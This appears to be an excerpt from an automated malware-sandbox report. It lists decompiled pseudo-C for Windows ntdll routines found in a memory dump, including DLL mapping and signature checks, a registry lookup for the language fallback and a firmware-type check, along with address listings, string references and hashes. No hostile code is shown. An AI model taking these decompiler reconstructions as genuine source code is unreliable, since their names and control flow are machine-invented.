                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01649C18
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01649C28
                                                • LdrpDoPostSnapWork, xrefs: 01649C1E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 2994545307-1948996284
                                                • Opcode ID: 90146bc88d88dc38d9eb79cbeb883402633c1ab4e234a8e4507eaf384434eaa7
                                                • Instruction ID: 8bc3cdd0c9fdfb2274b557a57f3116f7decd1566c92ca9aed222168452175007
                                                • Opcode Fuzzy Hash: 90146bc88d88dc38d9eb79cbeb883402633c1ab4e234a8e4507eaf384434eaa7
                                                • Instruction Fuzzy Hash: 4691F171A002169FEF18DF59D881ABEBBB6FF84314F18456DDA01AF251D730E902CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E015F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E015FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E015EC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x16d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01665510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x16d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01607D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01607D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01667016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01607D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01607D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01667016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0161A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E015EB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                0x015f7e4c
                                                0x015f7e50
                                                0x015f7e55
                                                0x015f7e58
                                                0x015f7e5d
                                                0x015f7e71
                                                0x015f7f33
                                                0x015f7e77
                                                0x015f7e77
                                                0x015f7e79
                                                0x015f7e79
                                                0x015f7e7e
                                                0x015f7f45
                                                0x01649848
                                                0x00000000
                                                0x01649848
                                                0x015f7f4e
                                                0x015f7f53
                                                0x015f7f5a
                                                0x00000000
                                                0x00000000
                                                0x0164985a
                                                0x01649862
                                                0x01649866
                                                0x00000000
                                                0x0164986c
                                                0x00000000
                                                0x0164986c
                                                0x015f7e84
                                                0x015f7e84
                                                0x015f7e8d
                                                0x01649871
                                                0x015f7eb8
                                                0x015f7ec0
                                                0x015f7ec0
                                                0x015f7e9a
                                                0x0164987e
                                                0x00000000
                                                0x00000000
                                                0x01649884
                                                0x0164988b
                                                0x016498a7
                                                0x016498ac
                                                0x016498b1
                                                0x016498b6
                                                0x016498b8
                                                0x016498b8
                                                0x016498b9
                                                0x00000000
                                                0x016498b9
                                                0x015f7ea0
                                                0x015f7ea7
                                                0x00000000
                                                0x00000000
                                                0x015f7eac
                                                0x015f7eb1
                                                0x015f7ec6
                                                0x015f7ed0
                                                0x016498cc
                                                0x015f7ed6
                                                0x015f7ed6
                                                0x015f7ed6
                                                0x015f7ede
                                                0x015f7ee3
                                                0x016498e3
                                                0x016498f0
                                                0x01649902
                                                0x016498f2
                                                0x016498fb
                                                0x016498fb
                                                0x01649907
                                                0x0164991d
                                                0x0164991d
                                                0x01649907
                                                0x016498e3
                                                0x015f7ef0
                                                0x015f7f14
                                                0x015f7f14
                                                0x015f7f1e
                                                0x01649946
                                                0x015f7f24
                                                0x015f7f24
                                                0x015f7f24
                                                0x015f7f2c
                                                0x0164996a
                                                0x01649975
                                                0x01649975
                                                0x0164997e
                                                0x01649993
                                                0x01649993
                                                0x0164997e
                                                0x00000000
                                                0x015f7ef2
                                                0x015f7efc
                                                0x015f7f0a
                                                0x015f7f0e
                                                0x01649933
                                                0x00000000
                                                0x01649933
                                                0x00000000
                                                0x015f7f0e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015f7eb1

                                                Strings
                                                • LdrpCompleteMapModule, xrefs: 01649898
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01649891
                                                • minkernel\ntdll\ldrmap.c, xrefs: 016498A2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: 6a2e1e5f284560467ba2829226c651f1c4f51af53238f54e6bb31a4742c1158f
                                                • Instruction ID: 12c1f594e208ea7079033856196bfaa751aa02a50fe9a74126b27bdea7f0e03e
                                                • Opcode Fuzzy Hash: 6a2e1e5f284560467ba2829226c651f1c4f51af53238f54e6bb31a4742c1158f
                                                • Instruction Fuzzy Hash: C251AB31A006469FE726CF6CCD44B2A7BE4BB49718F140AAEEB519B7D1D734E900CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015EE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E015EE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E015EF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016295D0();
						}
						if(_t78 != 0) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0162FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0162BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01629600();
					if(_t97 < 0) {
						goto L6;
					}
					E0162BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L015EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0162BB40(_t83, _t102 + 0x24, _t78);
								if(L015F43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0162BB40(_t84, _t102 + 0x24, _t94);
									if(L015F43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                0x015ee620
                                                0x015ee628
                                                0x015ee62f
                                                0x015ee631
                                                0x015ee635
                                                0x015ee637
                                                0x015ee63e
                                                0x01645503
                                                0x01645503
                                                0x015ee64c
                                                0x015ee64c
                                                0x015ee651
                                                0x00000000
                                                0x00000000
                                                0x015ee661
                                                0x015ee665
                                                0x0164542a
                                                0x015ee715
                                                0x015ee71a
                                                0x015ee71c
                                                0x015ee720
                                                0x015ee720
                                                0x015ee727
                                                0x015ee736
                                                0x015ee736
                                                0x015ee743
                                                0x015ee743
                                                0x015ee673
                                                0x015ee678
                                                0x015ee67d
                                                0x015ee682
                                                0x015ee685
                                                0x015ee692
                                                0x015ee69b
                                                0x015ee6a3
                                                0x015ee6ad
                                                0x015ee6b1
                                                0x015ee6b2
                                                0x015ee6bb
                                                0x015ee6bf
                                                0x015ee6c0
                                                0x015ee6c8
                                                0x015ee6cc
                                                0x015ee6d5
                                                0x015ee6d9
                                                0x00000000
                                                0x00000000
                                                0x015ee6e5
                                                0x015ee6ea
                                                0x015ee6f9
                                                0x015ee70b
                                                0x015ee70f
                                                0x01645439
                                                0x0164545e
                                                0x0164545e
                                                0x00000000
                                                0x0164545e
                                                0x0164543b
                                                0x0164543e
                                                0x01645440
                                                0x01645445
                                                0x01645472
                                                0x01645475
                                                0x0164548d
                                                0x01645493
                                                0x016454a9
                                                0x00000000
                                                0x00000000
                                                0x016454ab
                                                0x016454b4
                                                0x016454bc
                                                0x016454c8
                                                0x016454de
                                                0x016454fb
                                                0x016454e0
                                                0x016454e6
                                                0x016454eb
                                                0x016454eb
                                                0x016454de
                                                0x00000000
                                                0x016454bc
                                                0x01645477
                                                0x0164547a
                                                0x01645480
                                                0x01645483
                                                0x01645486
                                                0x0164548b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0164548b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01645447
                                                0x01645447
                                                0x01645447
                                                0x01645447
                                                0x0164544e
                                                0x00000000
                                                0x00000000
                                                0x01645450
                                                0x01645452
                                                0x01645455
                                                0x0164545a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0164545c
                                                0x0164546a
                                                0x0164546d
                                                0x0164546f
                                                0x00000000
                                                0x0164546f
                                                0x015ee70f

                                                Strings
                                                • InstallLanguageFallback, xrefs: 015EE6DB
                                                • @, xrefs: 015EE6C0
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015EE68C
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1757540487
                                                • Opcode ID: 3c9bb0e1493e7233ff6688147a312581739ddc982a250d5d17ae194d942315d1
                                                • Instruction ID: 80927062c6e3a0aae753d0a445bd4c97802df957f4a28dfb59c8b52e1d4236f6
                                                • Opcode Fuzzy Hash: 3c9bb0e1493e7233ff6688147a312581739ddc982a250d5d17ae194d942315d1
                                                • Instruction Fuzzy Hash: 8B51B3766153569BD714DF68C844A6BB7E8FF88714F04092EFA86DB240FB34D904C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016651BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E016651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x16c05f0);
				E0163D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E015FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016653CA(0);
						return E0163D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0162F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01603690(1, _t117, 0x15c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0162AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01604620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0162AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0166500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01629860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                0x016651be
                                                0x016651c3
                                                0x016651c8
                                                0x016651cd
                                                0x016651d0
                                                0x016651d3
                                                0x016651d8
                                                0x016651db
                                                0x016651de
                                                0x016651e0
                                                0x016651e3
                                                0x016651e6
                                                0x016651e8
                                                0x01665342
                                                0x01665351
                                                0x01665356
                                                0x0166535a
                                                0x01665360
                                                0x01665363
                                                0x01665366
                                                0x01665369
                                                0x01665369
                                                0x0166536b
                                                0x0166536b
                                                0x01665370
                                                0x016653a3
                                                0x016653a4
                                                0x016653a6
                                                0x016653ab
                                                0x016653ab
                                                0x016653ae
                                                0x016653ae
                                                0x016653b5
                                                0x016653bf
                                                0x016653bf
                                                0x01665375
                                                0x01665396
                                                0x016653a0
                                                0x016653a0
                                                0x00000000
                                                0x01665396
                                                0x01665377
                                                0x01665379
                                                0x0166537f
                                                0x0166538c
                                                0x01665390
                                                0x00000000
                                                0x01665390
                                                0x016651ee
                                                0x016651f1
                                                0x01665301
                                                0x01665310
                                                0x01665315
                                                0x01665318
                                                0x0166531b
                                                0x01665320
                                                0x0166532e
                                                0x01665331
                                                0x00000000
                                                0x01665331
                                                0x01665328
                                                0x01665329
                                                0x00000000
                                                0x01665329
                                                0x016651fa
                                                0x01665235
                                                0x01665236
                                                0x01665239
                                                0x0166523f
                                                0x01665240
                                                0x01665241
                                                0x01665242
                                                0x01665246
                                                0x01665247
                                                0x0166524e
                                                0x01665251
                                                0x01665267
                                                0x01665269
                                                0x0166526e
                                                0x0166527d
                                                0x0166527e
                                                0x01665281
                                                0x01665282
                                                0x01665287
                                                0x01665288
                                                0x0166528a
                                                0x0166528f
                                                0x01665294
                                                0x00000000
                                                0x00000000
                                                0x0166529a
                                                0x0166529c
                                                0x0166529e
                                                0x0166529e
                                                0x016652a4
                                                0x016652b0
                                                0x00000000
                                                0x00000000
                                                0x016652ba
                                                0x016652bc
                                                0x016652bc
                                                0x016652d4
                                                0x016652d9
                                                0x016652dc
                                                0x016652e1
                                                0x00000000
                                                0x00000000
                                                0x016652e7
                                                0x016652f4
                                                0x00000000
                                                0x016652f4
                                                0x01665270
                                                0x00000000
                                                0x01665270
                                                0x016651fc
                                                0x016651fd
                                                0x01665202
                                                0x01665203
                                                0x01665205
                                                0x0166520a
                                                0x0166520f
                                                0x00000000
                                                0x00000000
                                                0x0166521b
                                                0x01665226
                                                0x0166522b
                                                0x0166521d
                                                0x0166521d
                                                0x01665222
                                                0x01665222
                                                0x0166522d
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 52a71284adc9718673782ab3a8a5ada84216836ee1eaae0e93223a6c05723add
                                                • Instruction ID: 237b0174b4b6526db07d14e2794dfa8561ab6db51f927d93a8a8401ed6d28ded
                                                • Opcode Fuzzy Hash: 52a71284adc9718673782ab3a8a5ada84216836ee1eaae0e93223a6c05723add
                                                • Instruction Fuzzy Hash: 2D517D71A007199FDB24DFA9CD81AAEBBF9FF48B40F14402DE64AEB251E7719901CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0160B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 76%
                                                			E0160B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x16dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01607D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E016B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01629E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0162B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0162CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01607D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E016B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0162AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x16d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x16d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x16d8628; // 0x0
							_t116 =  *0x16d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                0x0160b94c
                                                0x0160b956
                                                0x0160b95c
                                                0x0160b95e
                                                0x0160b964
                                                0x0160b969
                                                0x0160b96d
                                                0x0160b96d
                                                0x0160b970
                                                0x0160b974
                                                0x0160b97a
                                                0x0160badf
                                                0x0160badf
                                                0x0160bae2
                                                0x0160bae4
                                                0x0160bae6
                                                0x0160baf0
                                                0x01652cb8
                                                0x0160baf6
                                                0x0160baf6
                                                0x0160baf6
                                                0x0160bafd
                                                0x0160bb1f
                                                0x0160bb1f
                                                0x0160baff
                                                0x0160bb00
                                                0x0160bb00
                                                0x0160bb03
                                                0x0160bb03
                                                0x0160bacb
                                                0x0160bacf
                                                0x0160bad0
                                                0x0160bad1
                                                0x0160badc
                                                0x0160badc
                                                0x0160b980
                                                0x0160b980
                                                0x0160b988
                                                0x0160b98b
                                                0x0160b98d
                                                0x0160b990
                                                0x0160b993
                                                0x0160b999
                                                0x0160b99b
                                                0x0160b9a1
                                                0x0160b9a5
                                                0x0160b9aa
                                                0x0160b9b0
                                                0x0160b9bb
                                                0x0160b9c0
                                                0x0160b9c3
                                                0x0160b9ca
                                                0x0160b9cc
                                                0x0160b9cf
                                                0x0160b9d3
                                                0x0160b9d7
                                                0x0160ba94
                                                0x0160ba94
                                                0x0160ba98
                                                0x0160baa3
                                                0x01652ccb
